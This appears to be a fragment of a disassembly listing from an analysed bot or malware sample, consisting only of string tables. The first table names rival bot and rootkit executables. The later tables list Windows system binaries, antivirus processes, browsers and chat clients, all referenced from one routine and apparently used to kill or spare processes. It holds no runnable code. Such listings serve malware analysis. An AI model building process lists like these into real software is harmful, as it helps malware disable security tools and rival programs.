dd offset aPhatbot_exe ; "PHATBOT.EXE"
dd offset aA_exe ; "A.EXE"
dd offset aAgo_exe ; "AGO.EXE"
dd offset aAg_exe ; "AG.EXE"
dd offset aAg32_exe ; "AG32.EXE"
dd offset aPb_exe ; "PB.EXE"
dd offset aWonk_exe ; "WONK.EXE"
dd offset aAgobotsvc_exe ; "AGOBOTSVC.EXE"
dd offset aForbot_exe ; "FORBOT.EXE"
dd offset aUrxbot_exe ; "URXBOT.EXE"
dd offset aAsn_exe ; "ASN.EXE"
dd offset aPnp_exe ; "PNP.EXE"
dd offset aUrx_exe ; "URX.EXE"
dd offset aDowner_exe ; "DOWNER.EXE"
dd offset aWebex_exe ; "WEBEX.EXE"
dd offset aLoader32_exe ; "LOADER32.EXE"
dd offset aRunbatch_exe ; "RUNBATCH.EXE"
dd offset aGsec_exe ; "GSEC.EXE"
dd offset aWindll_exe ; "WINDLL.EXE"
dd offset aDllhst_exe ; "DLLHST.EXE"
dd offset aWinhelp_exe_0 ; "WINHELP.EXE"
dd offset aExe_exe ; "EXE.EXE"
dd offset aExe32_exe ; "EXE32.EXE"
dd offset aUpdates_exe ; "UPDATES.EXE"
dd offset aT00lkit_exe ; "T00LKIT.EXE"
dd offset aRootkit_exe ; "ROOTKIT.EXE"
dd offset aRk_exe ; "RK.EXE"
dd offset aR00tkit_exe ; "R00TKIT.EXE"
dd offset aUtils32_exe ; "UTILS32.EXE"
dd offset aUniversal_exe ; "UNIVERSAL.EXE"
dd offset aDcomd_exe ; "DCOMD.EXE"
dd offset aDcz_exe ; "DCZ.EXE"
dd offset aDc_exe ; "DC.EXE"
dd offset aAkbot_exe ; "AKBOT.EXE"
dd offset aSxot_exe ; "SXOT.EXE"
dd offset aMssql32_exe ; "MSSQL32.EXE"
dd offset aSsql_exe ; "SSQL.EXE"
dd offset aWinsocket_exe ; "WINSOCKET.EXE"
dd offset aWinupdaterar_e ; "WINUPDATERAR.EXE"
dd offset aWmism23_exe ; "WMISM23.EXE"
dd offset aSysmgr64_exe ; "SYSMGR64.EXE"
dd offset aWebmsn_exe ; "WEBMSN.EXE"
dd offset aWanmpsvc_exe ; "WANMPSVC.EXE"
dd offset aEbay_exe ; "EBAY.EXE"
dd offset aWinsnte_exe ; "WINSNTE.EXE"
dd offset aWinpkr_exe ; "WINPKR.EXE"
dd offset aMswdns32_exe ; "MSWDNS32.EXE"
dd offset aBulk_exe ; "BULK.EXE"
dd offset aBlkl_exe ; "BLKL.EXE"
dd offset aIs67538_exe ; "IS67538.EXE"
dd offset aVideoati0_exe ; "VIDEOATI0.EXE"
dd offset aSpooisv_exe ; "SPOOISV.EXE"
dd offset aWiniogon_exe ; "WINIOGON.EXE"
dd offset aIsass_exe ; "ISASS.EXE"
dd offset aWinuppd_exe ; "WINUPPD.EXE"
dd offset aWinclean_exe ; "WINCLEAN.EXE"
dd offset aDisk10_exe ; "DISK10.EXE"
dd offset aW32sim_exe ; "W32SIM.EXE"
dd offset aWishs_exewsemg ; "WISHS.EXEWSEMGR.EXE"
dd offset aWnetwork_exe ; "WNETWORK.EXE"
dd offset aOwnt_exe ; "OWNT.EXE"
dd offset aUay_exe ; "UAY.EXE"
dd offset aHookiat_exe ; "HOOKIAT.EXE"
dd offset aJoined_exe ; "JOINED.EXE"
dd offset aRserver_exe ; "RSERVER.EXE"
dd offset aHtran_v1_exe ; "HTRAN_V1.EXE"
dd offset aBlkl_exe ; "BLKL.EXE"
dd offset aBox_exe ; "BOX.EXE"
dd offset aLam_exe ; "LAM.EXE"
dd offset aAbo_exe ; "ABO.EXE"
dd offset aLoadadv735_exe ; "LOADADV735.EXE"
dd offset aM_exe ; "M.EXE"
dd offset aNope_exe ; "NOPE.EXE"
dd offset aGt_exe ; "GT.EXE"
dd offset aNxm_exe ; "NXM.EXE"
dd offset aDual_exe ; "DUAL.EXE"
dd offset a5h7h8v6b1c5_ex ; "5H7H8V6B1C5.EXE"
dd offset aTamer_bat_exe ; "TAMER.BAT.EXE"
dd offset aOf_exe ; "OF.EXE"
dd offset aO1o2o3o4_exe ; "O1O2O3O4.EXE"
dd offset aOurnik_exe ; "OURNIK.EXE"
dd offset aPs2m_exe ; "PS2M.EXE"
dd offset aSecuraq_exe ; "SECURAQ.EXE"
dd offset aScans_exe ; "SCANS.EXE"
dd offset aTest_exe ; "TEST.EXE"
dd offset aKa6ber_exe ; "KA6BER.EXE"
dd offset aV1rg1n_exe_0 ; "V1Rg1N.EXE"
dd offset aU_exe ; "U.EXE"
dd offset aV1rgf_exe ; "V1RGF.EXE"
dd offset aJssa_exe ; "JSSA.EXE"
dd offset aAdv693_exe ; "ADV693.EXE"
dd offset aXgun_exe ; "XGUN.EXE"
dd offset aRopnc_exe ; "ROPNC.EXE"
dd offset aV1rg1n_exe ; "V1RG1N.EXE"
dd offset aIrb_exe ; "IRB.EXE"
dd offset aRspool_exe ; "RSPOOL.EXE"
dd offset aDmi_exe ; "DMI.EXE"
dd offset aWqrtuhx_exe ; "WQRTUHX.EXE"
dd offset aWinpga_exe ; "WINPGA.EXE"
dd offset aHz_exe ; "HZ.EXE"
dd offset aWolff_exe ; "WOLFF.EXE"
dd offset aA_exe ; "A.EXE"
dd offset aGg_exe ; "GG.EXE"
dd offset aWebxgrab_exe ; "WEBXGRAB.EXE"
dd offset aLogdec_exe ; "LOGDEC.EXE"
dd offset aLogoner_exe ; "LOGONER.EXE"
dd offset aRun_bot_bat_ex ; "RUN_BOT.BAT.EXE"
dd offset aRootkit2_exe ; "ROOTKIT2.EXE"
dd offset aMsnet_bat ; "MSNET.BAT"
dd offset aWsg32_exe ; "WSG32.EXE"
dd offset aDog_bat ; "DOG.BAT"
dd offset aInssvc_exe ; "INSSVC.EXE"
dd offset aConvertxdccfil ; "CONVERTXDCCFILE.EXE"
dd offset aNsecurity_exe ; "NSECURITY.EXE"
dd offset aDup_exe ; "DUP.EXE"
dd offset aHxdofena_exe ; "HXDOFENA.EXE"
dd offset aWindows12_exe ; "WINDOWS12.EXE"
dd offset aMssmpp_exe ; "MSSMPP.EXE"
dd offset aSvc_exe ; "SVC.EXE"
dd offset aSvchostc_exe ; "SVCHOSTC.EXE"
dd offset aSvchosts_exe ; "SVCHOSTS.EXE"
dd offset aSvshost_exe ; "SVSHOST.EXE"
dd offset aSystem_exe ; "SYSTEM.EXE"
dd offset aSystem32_exe ; "SYSTEM32.EXE"
dd offset aSysupd_exe ; "SYSUPD.EXE"
align 8
off_4488F8 dd offset dword_443990 ; DATA XREF: sub_41F02F+142�r
dd offset aAsr__exe ; "asr_*.exe"
dd offset aWmsoft_exe ; "wmsoft*.exe"
dd offset aNview_exe ; "nview.exe"
dd offset aSview_exe ; "sview.exe"
dd offset aNvuninst_exe ; "NVUNINST.EXE"
dd offset aNvsvc32_exe ; "nvsvc32.exe"
dd offset aNvudisp_exe ; "nvudisp.exe"
dd offset aNvappbar_exe ; "nvappbar.exe"
dd offset aNvcolor_exe ; "nvcolor.exe"
dd offset aNvdspsch_exe ; "nvdspsch.exe"
dd offset aNvcplui_exe ; "nvcplui.exe"
dd offset aNwiz_exe ; "nwiz.exe"
dd offset aKeystone_exe ; "keystone.exe"
dd offset aHdashcut_exe ; "HDAShCut.exe"
dd offset aAccwiz_exe ; "accwiz.exe"
dd offset aActmovie_exe ; "actmovie.exe"
dd offset aAhui_exe ; "ahui.exe"
dd offset aAlg_exe ; "alg.exe"
dd offset aAppend_exe ; "append.exe"
dd offset aArp_exe ; "arp.exe"
dd offset aAsr_fmt_exe ; "asr_fmt.exe"
dd offset aAsr_ldm_exe ; "asr_ldm.exe"
dd offset aAsr_pfu_exe ; "asr_pfu.exe"
dd offset aAt_exe ; "at.exe"
dd offset aAti2evxx_exe ; "ati2evxx.exe"
dd offset aAti2mdxx_exe ; "Ati2mdxx.exe"
dd offset aAtmadm_exe ; "atmadm.exe"
dd offset aAttrib_exe ; "attrib.exe"
dd offset aAuditusr_exe ; "auditusr.exe"
dd offset aAutochk_exe ; "autochk.exe"
dd offset aAutoconv_exe ; "autoconv.exe"
dd offset aAutofmt_exe ; "autofmt.exe"
dd offset aAutolfn_exe ; "autolfn.exe"
dd offset aBlastcln_exe ; "blastcln.exe"
dd offset aBootcfg_exe ; "bootcfg.exe"
dd offset aBootok_exe ; "bootok.exe"
dd offset aBootvrfy_exe ; "bootvrfy.exe"
dd offset aCacls_exe ; "cacls.exe"
dd offset aCalc_exe ; "calc.exe"
dd offset aCharmap_exe ; "charmap.exe"
dd offset aChcfg_exe ; "ChCfg.exe"
dd offset aChkdsk_exe ; "chkdsk.exe"
dd offset aChkntfs_exe ; "chkntfs.exe"
dd offset aCidaemon_exe ; "cidaemon.exe"
dd offset aCipher_exe ; "cipher.exe"
dd offset aCisvc_exe ; "cisvc.exe"
dd offset aCkcnv_exe ; "ckcnv.exe"
dd offset aCleanmgr_exe ; "cleanmgr.exe"
dd offset aCliconfg_exe ; "cliconfg.exe"
dd offset aClipbrd_exe ; "clipbrd.exe"
dd offset aClipsrv_exe ; "clipsrv.exe"
dd offset aClspack_exe ; "clspack.exe"
dd offset aCmd_exe ; "cmd.exe"
dd offset aCmdl32_exe ; "cmdl32.exe"
dd offset aCmmon32_exe ; "cmmon32.exe"
dd offset aCmstp_exe ; "cmstp.exe"
dd offset aComp_exe ; "comp.exe"
dd offset aCompact_exe ; "compact.exe"
dd offset aConime_exe ; "conime.exe"
dd offset aControl_exe ; "control.exe"
dd offset aConvert_exe ; "convert.exe"
dd offset aCscript_exe ; "cscript.exe"
dd offset aCsrss_exe ; "csrss.exe"
dd offset aCtfmon_exe ; "ctfmon.exe"
dd offset aDcomcnfg_exe ; "dcomcnfg.exe"
dd offset aDdeshare_exe ; "ddeshare.exe"
dd offset aDebug_exe ; "debug.exe"
dd offset aDefrag_exe ; "defrag.exe"
dd offset aDfrgfat_exe ; "dfrgfat.exe"
dd offset aDfrgntfs_exe ; "dfrgntfs.exe"
dd offset aDiantz_exe ; "diantz.exe"
dd offset aDiskpart_exe ; "diskpart.exe"
dd offset aDiskperf_exe ; "diskperf.exe"
dd offset aDllhost_exe ; "dllhost.exe"
dd offset aDllhst3g_exe ; "dllhst3g.exe"
dd offset aDmadmin_exe ; "dmadmin.exe"
dd offset aDmremote_exe ; "dmremote.exe"
dd offset aDoskey_exe ; "doskey.exe"
dd offset aDosx_exe ; "dosx.exe"
dd offset aDplaysvr_exe ; "dplaysvr.exe"
dd offset aDpnsvr_exe ; "dpnsvr.exe"
dd offset aDpvsetup_exe ; "dpvsetup.exe"
dd offset aDriverquery_ex ; "driverquery.exe"
dd offset aDrwatson_exe ; "drwatson.exe"
dd offset aDrwtsn32_exe ; "drwtsn32.exe"
dd offset aDumprep_exe ; "dumprep.exe"
dd offset aDvdplay_exe ; "dvdplay.exe"
dd offset aDvdupgrd_exe ; "dvdupgrd.exe"
dd offset aDwwin_exe ; "dwwin.exe"
dd offset aDxdiag_exe ; "dxdiag.exe"
dd offset aEdlin_exe ; "edlin.exe"
dd offset aEsentutl_exe ; "esentutl.exe"
dd offset aEudcedit_exe ; "eudcedit.exe"
dd offset aEventcreate_ex ; "eventcreate.exe"
dd offset aEventtriggers_ ; "eventtriggers.exe"
dd offset aEventvwr_exe ; "eventvwr.exe"
dd offset aExe2bin_exe ; "exe2bin.exe"
dd offset aExpand_exe ; "expand.exe"
dd offset aExtrac32_exe ; "extrac32.exe"
dd offset aFastopen_exe ; "fastopen.exe"
dd offset aFc_exe ; "fc.exe"
dd offset aFind_exe ; "find.exe"
dd offset aFindstr_exe ; "findstr.exe"
dd offset aFinger_exe ; "finger.exe"
dd offset aFixmapi_exe ; "fixmapi.exe"
dd offset aFltmc_exe ; "fltMc.exe"
dd offset aFontview_exe ; "fontview.exe"
dd offset aForcedos_exe ; "forcedos.exe"
dd offset aFreecell_exe ; "freecell.exe"
dd offset aFsquirt_exe ; "fsquirt.exe"
dd offset aFsutil_exe ; "fsutil.exe"
dd offset aFtp_exe ; "ftp.exe"
dd offset aGb2312_uce ; "gb2312.uce"
dd offset aGdi_exe ; "gdi.exe"
dd offset aGetmac_exe ; "getmac.exe"
dd offset aGpresult_exe ; "gpresult.exe"
dd offset aGpupdate_exe ; "gpupdate.exe"
dd offset aGrpconv_exe ; "grpconv.exe"
dd offset aHelp_exe ; "help.exe"
dd offset aHostname_exe ; "hostname.exe"
dd offset aIe4uinit_exe ; "ie4uinit.exe"
dd offset aIexpress_exe ; "iexpress.exe"
dd offset aImapi_exe ; "imapi.exe"
dd offset aIpconfig_exe ; "ipconfig.exe"
dd offset aIpsec6_exe ; "ipsec6.exe"
dd offset aIpv6_exe ; "ipv6.exe"
dd offset aIpxroute_exe ; "ipxroute.exe"
dd offset aJava_exe ; "java.exe"
dd offset aJavaw_exe ; "javaw.exe"
dd offset aJavaws_exe ; "javaws.exe"
dd offset aJdbgmgr_exe ; "jdbgmgr.exe"
dd offset aJview_exe ; "jview.exe"
dd offset aKrnl386_exe ; "krnl386.exe"
dd offset aLabel_exe ; "label.exe"
dd offset aLights_exe ; "lights.exe"
dd offset aLnkstub_exe ; "lnkstub.exe"
dd offset aLocator_exe ; "locator.exe"
dd offset aLodctr_exe ; "lodctr.exe"
dd offset aLogagent_exe ; "logagent.exe"
dd offset aLogman_exe ; "logman.exe"
dd offset aLogoff_exe ; "logoff.exe"
dd offset aLogonui_exe ; "logonui.exe"
dd offset aLpq_exe ; "lpq.exe"
dd offset aLpr_exe ; "lpr.exe"
dd offset aLsass_exe ; "lsass.exe"
dd offset aMagnify_exe ; "magnify.exe"
dd offset aMakecab_exe ; "makecab.exe"
dd offset aMem_exe ; "mem.exe"
dd offset aMigpwd_exe ; "migpwd.exe"
dd offset aMmc_exe ; "mmc.exe"
dd offset aMnmsrvc_exe ; "mnmsrvc.exe"
dd offset aMobsync_exe ; "mobsync.exe"
dd offset aMountvol_exe ; "mountvol.exe"
dd offset aMplay32_exe ; "mplay32.exe"
dd offset aMpnotify_exe ; "mpnotify.exe"
dd offset aMqbkup_exe ; "mqbkup.exe"
dd offset aMqsvc_exe ; "mqsvc.exe"
dd offset aMqtgsvc_exe ; "mqtgsvc.exe"
dd offset aMrinfo_exe ; "mrinfo.exe"
dd offset aMrt_exe ; "MRT.exe"
dd offset aMscdexnt_exe ; "mscdexnt.exe"
dd offset aMsdtc_exe ; "msdtc.exe"
dd offset aMsg_exe ; "msg.exe"
dd offset aMshearts_exe ; "mshearts.exe"
dd offset aMshta_exe ; "mshta.exe"
dd offset aMsiexec_exe ; "msiexec.exe"
dd offset aMspaint_exe ; "mspaint.exe"
dd offset aMsswchx_exe ; "msswchx.exe"
dd offset aMstinit_exe ; "mstinit.exe"
dd offset aMstsc_exe ; "mstsc.exe"
dd offset aNarrator_exe ; "narrator.exe"
dd offset aNbtstat_exe ; "nbtstat.exe"
dd offset aNddeapir_exe ; "nddeapir.exe"
dd offset aNerocheck_exe ; "NeroCheck.exe"
dd offset aNet_exe ; "net.exe"
dd offset aNet1_exe ; "net1.exe"
dd offset aNetdde_exe ; "netdde.exe"
dd offset aNetsetup_exe ; "netsetup.exe"
dd offset aNetsh_exe ; "netsh.exe"
dd offset aNetstat_exe ; "netstat.exe"
dd offset aNlsfunc_exe ; "nlsfunc.exe"
dd offset aNotepad_exe_0 ; "notepad.exe"
dd offset aNslookup_exe ; "nslookup.exe"
dd offset aNtbackup_exe ; "ntbackup.exe"
dd offset aNtkrnlpa_exe ; "ntkrnlpa.exe"
dd offset aNtoskrnl_exe ; "ntoskrnl.exe"
dd offset aNtsd_exe ; "ntsd.exe"
dd offset aNtvdm_exe ; "ntvdm.exe"
dd offset aNw16_exe ; "nw16.exe"
dd offset aNwscript_exe ; "nwscript.exe"
dd offset aOdbcad32_exe ; "odbcad32.exe"
dd offset aOdbcconf_exe ; "odbcconf.exe"
dd offset aOpenfiles_exe ; "openfiles.exe"
dd offset aOsk_exe ; "osk.exe"
dd offset aOsuninst_exe ; "osuninst.exe"
dd offset aPackager_exe ; "packager.exe"
dd offset aPathping_exe ; "pathping.exe"
dd offset aPentnt_exe ; "pentnt.exe"
dd offset aPerfmon_exe ; "perfmon.exe"
dd offset aPing_exe ; "ping.exe"
dd offset aPing6_exe ; "ping6.exe"
dd offset aPowercfg_exe ; "powercfg.exe"
dd offset aPrint_exe ; "print.exe"
dd offset aProgman_exe ; "progman.exe"
dd offset aProquota_exe ; "proquota.exe"
dd offset aProxycfg_exe ; "proxycfg.exe"
dd offset aQappsrv_exe ; "qappsrv.exe"
dd offset aQprocess_exe ; "qprocess.exe"
dd offset aQwinsta_exe ; "qwinsta.exe"
dd offset aRasautou_exe ; "rasautou.exe"
dd offset aRasdial_exe ; "rasdial.exe"
dd offset aRasphone_exe ; "rasphone.exe"
dd offset aRcimlby_exe ; "rcimlby.exe"
dd offset aRcp_exe ; "rcp.exe"
dd offset aRdpclip_exe ; "rdpclip.exe"
dd offset aRdsaddin_exe ; "rdsaddin.exe"
dd offset aRdshost_exe ; "rdshost.exe"
dd offset aRecover_exe ; "recover.exe"
dd offset aRedir_exe ; "redir.exe"
dd offset aReg_exe ; "reg.exe"
dd offset aRegcladm_exe ; "REGCLADM.EXE"
dd offset aRegedt32_exe ; "regedt32.exe"
dd offset aRegini_exe ; "regini.exe"
dd offset aRegsvr32_exe ; "regsvr32.exe"
dd offset aRegwiz_exe ; "regwiz.exe"
dd offset aRelog_exe ; "relog.exe"
dd offset aReplace_exe ; "replace.exe"
dd offset aReset_exe ; "reset.exe"
dd offset aRexec_exe ; "rexec.exe"
dd offset aRoute_exe ; "route.exe"
dd offset aRoutemon_exe ; "routemon.exe"
dd offset aRsh_exe ; "rsh.exe"
dd offset aRsm_exe ; "rsm.exe"
dd offset aRsmsink_exe ; "rsmsink.exe"
dd offset aRsmui_exe ; "rsmui.exe"
dd offset aRsnotify_exe ; "rsnotify.exe"
dd offset aRsopprov_exe ; "rsopprov.exe"
dd offset aRsvp_exe ; "rsvp.exe"
dd offset aRtcshare_exe ; "rtcshare.exe"
dd offset aRtlcpl_exe ; "RTLCPL.EXE"
dd offset aRunas_exe ; "runas.exe"
dd offset aRundll32_exe ; "rundll32.exe"
dd offset aRunonce_exe ; "runonce.exe"
dd offset aRwinsta_exe ; "rwinsta.exe"
dd offset aSavedump_exe ; "savedump.exe"
dd offset aSc_exe ; "sc.exe"
dd offset aScardsvr_exe ; "scardsvr.exe"
dd offset aSchtasks_exe ; "schtasks.exe"
dd offset aSdbinst_exe ; "sdbinst.exe"
dd offset aSecedit_exe ; "secedit.exe"
dd offset aServices_exe ; "services.exe"
dd offset aSessmgr_exe ; "sessmgr.exe"
dd offset aSethc_exe ; "sethc.exe"
dd offset aSetup_exe ; "setup.exe"
dd offset aSetver_exe ; "setver.exe"
dd offset aSfc_exe ; "sfc.exe"
dd offset aShadow_exe ; "shadow.exe"
dd offset aShare_exe ; "share.exe"
dd offset aShmgrate_exe ; "shmgrate.exe"
dd offset aShrpubw_exe ; "shrpubw.exe"
dd offset aShutdown_exe ; "shutdown.exe"
dd offset aSigverif_exe ; "sigverif.exe"
dd offset aSkeys_exe ; "skeys.exe"
dd offset aSmbinst_exe ; "smbinst.exe"
dd offset aSmlogsvc_exe ; "smlogsvc.exe"
dd offset aSmss_exe ; "smss.exe"
dd offset aSndrec32_exe ; "sndrec32.exe"
dd offset aSndvol32_exe ; "sndvol32.exe"
dd offset aSol_exe ; "sol.exe"
dd offset aSort_exe ; "sort.exe"
dd offset aSpider_exe ; "spider.exe"
dd offset aSpiisupd_exe ; "spiisupd.exe"
dd offset aSpnpinst_exe ; "spnpinst.exe"
dd offset aSpoolsv_exe ; "spoolsv.exe"
dd offset aSprestrt_exe ; "sprestrt.exe"
dd offset aSpupdsvc_exe ; "spupdsvc.exe"
dd offset aStimon_exe ; "stimon.exe"
dd offset aSubrange_uce ; "subrange.uce"
dd offset aSubst_exe ; "subst.exe"
dd offset aSvchost_exe ; "svchost.exe"
dd offset aSyncapp_exe ; "syncapp.exe"
dd offset aSysedit_exe ; "sysedit.exe"
dd offset aSyskey_exe ; "syskey.exe"
dd offset aSysocmgr_exe ; "sysocmgr.exe"
dd offset aSysteminfo_exe ; "systeminfo.exe"
dd offset aSystray_exe ; "systray.exe"
dd offset aTaskkill_exe ; "taskkill.exe"
dd offset aTasklist_exe ; "tasklist.exe"
dd offset aTaskman_exe_0 ; "taskman.exe"
dd offset aTaskmgr_exe ; "taskmgr.exe"
dd offset aTcmsetup_exe ; "tcmsetup.exe"
dd offset aTcpsvcs_exe ; "tcpsvcs.exe"
dd offset aTelnet_exe ; "telnet.exe"
dd offset aTftp_exe ; "tftp.exe"
dd offset aTlntadmn_exe ; "tlntadmn.exe"
dd offset aTlntsess_exe ; "tlntsess.exe"
dd offset aTlntsvr_exe ; "tlntsvr.exe"
dd offset aTourstart_exe ; "tourstart.exe"
dd offset aTracerpt_exe ; "tracerpt.exe"
dd offset aTracert_exe ; "tracert.exe"
dd offset aTracert6_exe ; "tracert6.exe"
dd offset aTscon_exe ; "tscon.exe"
dd offset aTscupgrd_exe ; "tscupgrd.exe"
dd offset aTsdiscon_exe ; "tsdiscon.exe"
dd offset aTskill_exe ; "tskill.exe"
dd offset aTsshutdn_exe ; "tsshutdn.exe"
dd offset aTwunk_16_exe ; "twunk_16.exe"
dd offset aTwunk_32_exe ; "twunk_32.exe"
dd offset aTypeperf_exe ; "typeperf.exe"
dd offset aUnlodctr_exe ; "unlodctr.exe"
dd offset aUpnpcont_exe ; "upnpcont.exe"
dd offset aUps_exe ; "ups.exe"
dd offset aUser_exe ; "user.exe"
dd offset aUserinit_exe ; "userinit.exe"
dd offset aUsrmlnka_exe ; "usrmlnka.exe"
dd offset aUsrprbda_exe ; "usrprbda.exe"
dd offset aUsrshuta_exe ; "usrshuta.exe"
dd offset aUtilman_exe ; "utilman.exe"
dd offset aVerclsid_exe ; "verclsid.exe"
dd offset aVerifier_exe ; "verifier.exe"
dd offset aViral_exe ; "viral.exe"
dd offset aVssadmin_exe ; "vssadmin.exe"
dd offset aVssvc_exe ; "vssvc.exe"
dd offset aVwipxspx_exe ; "vwipxspx.exe"
dd offset aW32tm_exe ; "w32tm.exe"
dd offset aWextract_exe ; "wextract.exe"
dd offset aWiaacmgr_exe ; "wiaacmgr.exe"
dd offset aWinchat_exe ; "winchat.exe"
dd offset aWindbver_exe ; "WINDBVER.EXE"
dd offset aWinhlp32_exe ; "winhlp32.exe"
dd offset aWinmine_exe ; "winmine.exe"
dd offset aWinmsd_exe ; "winmsd.exe"
dd offset aWinspool_exe ; "winspool.exe"
dd offset aWinver_exe ; "winver.exe"
dd offset aWjview_exe ; "wjview.exe"
dd offset aWowdeb_exe ; "wowdeb.exe"
dd offset aWowexec_exe ; "wowexec.exe"
dd offset aWpabaln_exe ; "wpabaln.exe"
dd offset aWpnpinst_exe ; "wpnpinst.exe"
dd offset aWrite_exe ; "write.exe"
dd offset aWscntfy_exe ; "wscntfy.exe"
dd offset aWscript_exe ; "wscript.exe"
dd offset aWuauclt_exe ; "wuauclt.exe"
dd offset aWuauclt1_exe ; "wuauclt1.exe"
dd offset aWupdmgr_exe ; "wupdmgr.exe"
dd offset aXcopy_exe ; "xcopy.exe"
dd offset aAcdsee_scr ; "ACDSee.scr"
dd offset aLogon_scr ; "logon.scr"
dd offset aScrnsave_scr ; "scrnsave.scr"
dd offset aSeismosaver_sc ; "SeismoSaver.scr"
dd offset aSs3dfo_scr ; "ss3dfo.scr"
dd offset aSsbezier_scr ; "ssbezier.scr"
dd offset aSsflwbox_scr ; "ssflwbox.scr"
dd offset aSsmarque_scr ; "ssmarque.scr"
dd offset aSsmypics_scr ; "ssmypics.scr"
dd offset aSsmyst_scr ; "ssmyst.scr"
dd offset aSspipes_scr ; "sspipes.scr"
dd offset aSsstars_scr ; "ssstars.scr"
dd offset aSstext3d_scr ; "sstext3d.scr"
dd offset aSystem_1 ; "System"
dd offset aDevldr32_exe ; "devldr32.exe"
dd offset aInternat_exe ; "internat.exe"
dd offset aAti2evxx_exe ; "ati2evxx.exe"
dd offset aWudfhost_exe ; "WUDFHost.exe"
dd offset aPenservice_exe ; "penservice.exe"
dd offset aWmiexe_exe ; "wmiexe.exe"
dd offset aWinmgmt_exe ; "winmgmt.exe"
dd offset aWercon_exe ; "wercon.exe"
dd offset aTaskeng_exe ; "taskeng.exe"
dd offset aHkcmd_exe ; "hkcmd.exe"
dd offset aHotkey_exe ; "hotkey.exe"
dd offset aJusched_exe ; "jusched.exe"
dd offset aPoint32_exe ; "point32.exe"
dd offset aQttask_exe ; "qttask.exe"
dd offset aWisptis_exe ; "wisptis.exe"
dd offset aCrypserv_exe ; "crypserv.exe"
dd offset aInetinfo_exe ; "inetinfo.exe"
dd offset aIgfxpers_exe ; "igfxpers.exe"
dd offset aIgfxtray_exe ; "igfxtray.exe"
dd offset aPctspk_exe ; "pctspk.exe"
dd offset aMstask_exe ; "mstask.exe"
dd offset aSmagent_exe ; "smagent.exe"
dd offset aNmssvc_exe ; "nmssvc.exe"
dd offset aHpsysdrv_exe ; "hpsysdrv.exe"
dd offset aHpcmpmgr_exe ; "hpcmpmgr.exe"
dd offset aNhksrv_exe ; "nhksrv.exe"
dd offset aHpzipm12_exe ; "HPZipm12.exe"
dd offset aCli_exe ; "cli.exe"
dd offset aTphkmgr_exe ; "TPHKMGR.exe"
dd offset aSmax4pnp_exe ; "smax4pnp.exe"
dd offset aLoadqm_exe ; "loadqm.exe"
dd offset aLexbces_exe ; "lexbces.exe"
dd offset aDwm_exe ; "dwm.exe"
dd offset aLsm_exe ; "lsm.exe"
dd offset aMdm_exe ; "mdm.exe"
dd offset aMssearch_exe ; "mssearch.exe"
dd offset aRegsvc_exe ; "regsvc.exe"
dd offset aSdclt_exe ; "sdclt.exe"
dd offset aSlsvc_exe ; "slsvc.exe"
dd offset aHidserv_exe ; "hidserv.exe"
dd offset aUninstall__exe ; "uninstall_.exe"
dd offset aTrkwkss_exe ; "trkwkss.exe"
dd offset aWuaucpl_exe ; "wuaucpl.exe"
dd offset aTrkwksvc_exe ; "trkwksvc.exe"
dd offset aWmssvc_exe ; "wmssvc.exe"
dd offset aWmsncs_exe ; "wmsncs.exe"
dd offset aWiadss_exe ; "wiadss.exe"
dd offset aWmsnchrs_exe ; "wmsnchrs.exe"
dd offset aWrvmchars_exe ; "wrvmchars.exe"
off_448F60 dd offset dword_443990 ; DATA XREF: sub_41F02F:loc_41F1AE�r
dd offset aAsr__exe ; "asr_*.exe"
dd offset aWmsoft_exe ; "wmsoft*.exe"
dd offset aAlcmtr_exe ; "ALCMTR.EXE"
dd offset aAlcwzrd_exe ; "ALCWZRD.EXE"
dd offset aHdashcut_exe ; "HDAShCut.exe"
dd offset aRthdcpl_exe ; "RTHDCPL.EXE"
dd offset aRtlcpl_exe ; "RTLCPL.EXE"
dd offset aMiccal_exe ; "MicCal.exe"
dd offset aRtlupd_exe ; "RtlUpd.exe"
dd offset aAlcrmv_exe ; "alcrmv.exe"
dd offset aAlcupd_exe ; "alcupd.exe"
dd offset aExplorer_exe_0 ; "explorer.exe"
dd offset aHh_exe ; "hh.exe"
dd offset aIsuninst_exe ; "IsUninst.exe"
dd offset aIun6002_exe ; "iun6002.exe"
dd offset aNotepad_exe ; "NOTEPAD.EXE"
dd offset aRegedit_exe ; "regedit.exe"
dd offset aRegtlib_exe ; "REGTLIB.EXE"
dd offset aSetdebug_exe ; "setdebug.exe"
dd offset aSetup1_exe ; "Setup1.exe"
dd offset aSoundman_exe ; "SOUNDMAN.EXE"
dd offset aSt6unst_exe ; "ST6UNST.EXE"
dd offset aTaskman_exe ; "TASKMAN.EXE"
dd offset aTwunk_16_exe ; "twunk_16.exe"
dd offset aTwunk_32_exe ; "twunk_32.exe"
dd offset aWinhelp_exe ; "winhelp.exe"
dd offset aWinhlp32_exe ; "winhlp32.exe"
dd offset aSystem_1 ; "System"
dd offset aHtpatch_exe ; "htpatch.exe"
dd offset aPoint32_exe ; "point32.exe"
dd offset aSmagent_exe ; "smagent.exe"
dd offset aSmax4pnp_exe ; "smax4pnp.exe"
dd offset aSound_exe ; "*sound*.exe"
off_448FE8 dd offset dword_443990 ; DATA XREF: sub_41F02F:loc_41F1EB�r
dd offset aAsr__exe ; "asr_*.exe"
dd offset aWmsoft_exe ; "wmsoft*.exe"
dd offset aWmpcodecs_exe ; "wmpcodecs.exe"
dd offset aMsxml32_exe ; "msxml32.exe"
dd offset aMswupd_exe ; "mswupd.exe"
dd offset aMsnmsgr_exe ; "msnmsgr.exe"
dd offset aWmiprvse_exe ; "wmiprvse.exe"
dd offset aMsmsgs_exe ; "msmsgs.exe"
dd offset aMirc_exe ; "mirc.exe"
dd offset aXchat_exe ; "xchat.exe"
dd offset aFirefox_exe ; "firefox.exe"
dd offset aThunderbird_ex ; "thunderbird.exe"
dd offset aIexplore_exe ; "iexplore.exe"
dd offset aMsimn_exe ; "msimn.exe"
dd offset aMsoe_exe ; "msoe.exe"
dd offset aDefwatch_exe ; "defwatch.exe"
dd offset aRtvscan_exe ; "rtvscan.exe"
dd offset aCcapp_exe ; "ccapp.exe"
dd offset aAim_exe ; "aim.exe"
dd offset aCcevtmgr_exe ; "ccevtmgr.exe"
dd offset aCcsetmgr_exe ; "ccsetmgr.exe"
dd offset aIexplore_exe ; "iexplore.exe"
dd offset aWordpad_exe ; "wordpad.exe"
dd offset aSteam_exe ; "steam.exe"
dd offset aAutoexec_bat ; "AUTOEXEC.BAT"
dd offset aWmpnscfg_exe ; "wmpnscfg.exe"
dd offset aNotepad_exe_0 ; "notepad.exe"
dd offset aWvsscheduler_e ; "WVSScheduler.exe"
dd offset dword_449170
dd offset dword_449160
dd offset dword_449150
